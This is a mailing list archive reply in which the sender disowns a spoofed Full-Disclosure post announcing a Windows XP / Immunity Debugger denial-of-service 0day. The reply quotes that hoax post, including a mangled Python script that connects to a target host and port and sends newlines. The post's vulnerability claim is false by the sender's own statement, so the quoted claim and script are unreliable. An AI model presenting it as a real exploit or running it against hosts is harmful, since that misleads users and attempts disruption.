lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <1b0388d7c581bf7c7267f570af803a15.squirrel@sm.webmail.pair.com>
Date: Tue, 17 Apr 2012 10:07:05 -0400
From: adam@...osecinstitute.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in
 CTF exercise

Guys, this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.




>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>>  Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>> discovered on 4.9.12 by InfoSec Institute student #For full write
>> up and description go to
>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>>
> import sys
>> import os import time import getopt import socket
>>
>> class Error(Exception): def __init__(self, error):
>> self.errorStr=error  def __str__(self): return repr(self.errorStr)
>>
>> class Exploit():
>>
>> def __init__(self, targetHost, targetPort): self.targetHost =
>> targetHost
>>
>> def exploit(self, targetHost, targetPort):
>>
>> try: socket.inet_aton(targetHost) s =
>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>> s.connect((targetHost,targetPort)) except socket.error: raise
>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>
>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>> except: raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage(): print "[!] Usage:" print "	( -h, --help ):" print "
>> Print this message." print "	( --targetHost= ): Target host." print
>> "		--targetHost=127.0.0.1" print "	( --targetPort= ): Target
>> port." print "		--targetPort=8888"
>>
>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>> "targetPort="]) except getopt.GetoptError, err: # Print help
>> information and exit: print '[!] Parameter error:' + str(err) #
>> Will print something like "option -a not recognized" usage()
>> sys.exit(0)
>>
>> targetHost=None targetPort=None  for opt, arg in opts: if opt in
>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>> would be assuming to say we'll never get here. print "[!] Parameter
>> error." usage() sys.exit(0)  if not targetHost: print "[!]
>> Parameter error: targetHost not set." usage() sys.exit(0)
>>
>> if not targetPort: print "[!] Parameter error: targetPort not
>> set." usage() sys.exit(0)
>>
>> exploit = Exploit(targetHost, targetPort)
>>
>> print "[*] Attempting to exploit:"  try:
>> exploit.exploit(targetHost, int(targetPort)) except Error as
>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>> print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin # the
>> program. if __name__=='__main__': main()
>>
>>
>>
>> _______________________________________________ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.12 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
> 4r6K58WTZ7qR2nTNKnQi
> =Uoev
> -----END PGP SIGNATURE-----
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ